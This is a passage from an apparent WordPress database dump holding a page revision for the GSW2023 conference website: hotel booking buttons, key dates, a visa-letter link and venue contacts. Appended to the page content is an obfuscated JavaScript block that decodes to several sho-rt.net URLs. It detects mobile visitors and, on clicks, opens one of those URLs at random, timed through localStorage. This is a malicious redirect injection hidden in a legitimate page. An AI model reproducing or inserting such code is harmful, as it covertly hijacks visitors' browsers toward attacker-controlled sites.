link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 12:26:24','2023-08-13 12:26:24','',3066,'https://gsw2023.com/?p=5111',0,'revision','',0),
(5112,1,'2023-08-13 12:27:17','2023-08-13 12:27:17','<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #0000ff;\"><strong>Under the auspices of </strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h1>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" 